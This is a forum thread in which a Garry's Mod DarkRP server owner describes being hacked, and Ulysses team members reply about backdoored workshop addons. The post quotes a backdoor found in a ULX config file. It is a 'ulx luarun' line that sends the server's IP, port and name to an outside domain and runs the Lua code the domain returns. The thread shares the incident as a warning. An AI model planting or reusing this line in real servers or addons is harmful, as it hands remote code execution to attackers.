Author Topic: Server Hackers(Graphic Sexual Content Flashing on Players' Screens, Ban Evasion)  (Read 2672 times)

0 Members and 1 Guest are viewing this topic.

Offline Super

  • Newbie
  • *
  • Posts: 1
  • Karma: 0
Server hackers??? Oh great, just another clickbaity thread about a 12 year old kid complaining about scripters.

Well, not exactly.
This is a story time, so get settled in.

A little bit about me; I'm currently an independent developer/owner of a Garry's Mod DarkRP server with moderate coding knowledge, really enough to get me by. Been working on this server for the past month, and this is the first time (and hopefully last time) this happens to me.

It's just an average day on the server, everything's quiet, but then we receive an unexpected spike in players. Mostly minges because of being a new server, but non the less, still players. This seemed quite promising because it had been empty the past week. Everyone's just doing their own things, and I feel like its break time since I had been working non-stop for a couple of hours, so I get up to go eat some food. I'm standing there in my kitchen, enjoying my food, when my friend who was playing on my server turns to me with a worried look on his face and says "We're getting hacked."

Oh , what?! No way, this can't happen. I had a feeling...

Thoughts started racing through my head, and so I finished up quickly and went to my computer. There on my screen is an image of graphic pornographic material flashing on my screen. Everyone was complaining about it on the server, so I was quite concerned. My garry's mod runs in fullscreen, so definitely couldn't be another application causing this. I've heard about this one other time and I thought it wasn't real. Oh boy was I wrong! Since the pornographic image was flashing constantly, I decide it's investigation time.

While on the server, I search through my console, the server's chat history, and all the players to find the troublesome players. Turns out, a few individuals were involved. I found who I thought to be the main troublemaker, named "in0xia" along with a possibly malicious URL, mostly because my friend had ULX banned him multiple times but never actually got kicked, so I decided to start taking action. I went straight to an addon that allows me to grab user's IP addresses, and ULX IPBanned (through a ULX addon) the player, and he finally disconnected. I also attempted banning a player called 'b a n k s y' but even when server echoed that he was ULX banned, he was still right in front of my face. in0xia was instantly able to rejoin the server, so since ban wasn't working, I started crashing both of their clients every time they attempted to join the server. Before any more destruction could be caused, I pulled the plug on the server.

I frantically started searching through all my files looking for possible backdoors, and one of the first file paths I searched through was ULX. I found not a backdoor, not a command, but ~35,000 lines of code! Under data/ulx/config.txt, I found some code that forced ULX to include a function that fetches the server's IP address, hostport, and name and sends it off to a server.

Code: [Select]
ulx luarun "function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end"There was also code before and after the above code that disabled ulx logecho before the function was executed and re-enabled ulx logecho after the function was finished.

I went to the website inside the http.Fetch and it returns with 'This is for servers only...'
Code: [Select]
https://xn--vxao.pw/tracker.php?port=No luck.

So I decided to head to just the domain itself, and it linked to:
Code: [Select]
https://xn--vxao.pw/JACKPOT!!

In that website included multiple contact information, including their twitter, discord, and steam! I decided to head straight to the steam profile, and what do I know, it's one of the players causing the trouble on my server!

I still haven't pinpointed where it makes the pornographic images to flash on the screen, but I figured letting all you all know that this isn't an 'urban legend of gmod' or whatever would be useful. I'd highly advise that you ban their SteamID's before they even get on your server, because then you too might have porn spammed on all your users' screens and possibly have worse happen to you.



Offline JamminR

  • Ulysses Team Member
  • Hero Member
  • *****
  • Posts: 8096
  • Karma: 390
  • Sertafide Ulysses Jenius
    • Team Ulysses [ULib/ULX, other fine releases]
You likely used a Steam workshop addon that had a back door.
See https://facepunch.com/showthread.php?t=1551921
Though ULX makes it easy for humans to admin, allowing random code to run on your server makes it just as easy for those who write back doors to use ULX commands too as console/root.

Older post - with video link of similar screen control.
https://facepunch.com/showthread.php?t=1521418

Anyway, though it's ULX commands being run, it's not ULX's fault - some server owners such as yourself are trusting steam workshop code that shouldn't be.
(or worse, and deserved, running exploited releases from scriptfodder that were leaks)
« Last Edit: February 20, 2017, 08:55:17 PM by JamminR »
"Though a program be but three lines long, someday it will have to be maintained." -- The Tao of Programming

Offline Stickly Man!

  • Ulysses Team Member
  • Hero Member
  • *****
  • Posts: 1270
  • Karma: 164
  • What even IS software anymore?
    • XGUI
We are planning on addressing the issue where config.txt can be used to store/execute arbitrary commands and code. This will close one method of persistency of such attacks, however, it will not completely prevent them.

As a side note, you really should be careful with workshop addons. A large dump was recently made with a bunch of addons that had suspicious code- most of which have been updated or taken down: https://facepunch.com/showthread.php?t=1552592
Join our Team Ulysses community discord! https://discord.gg/gR4Uye6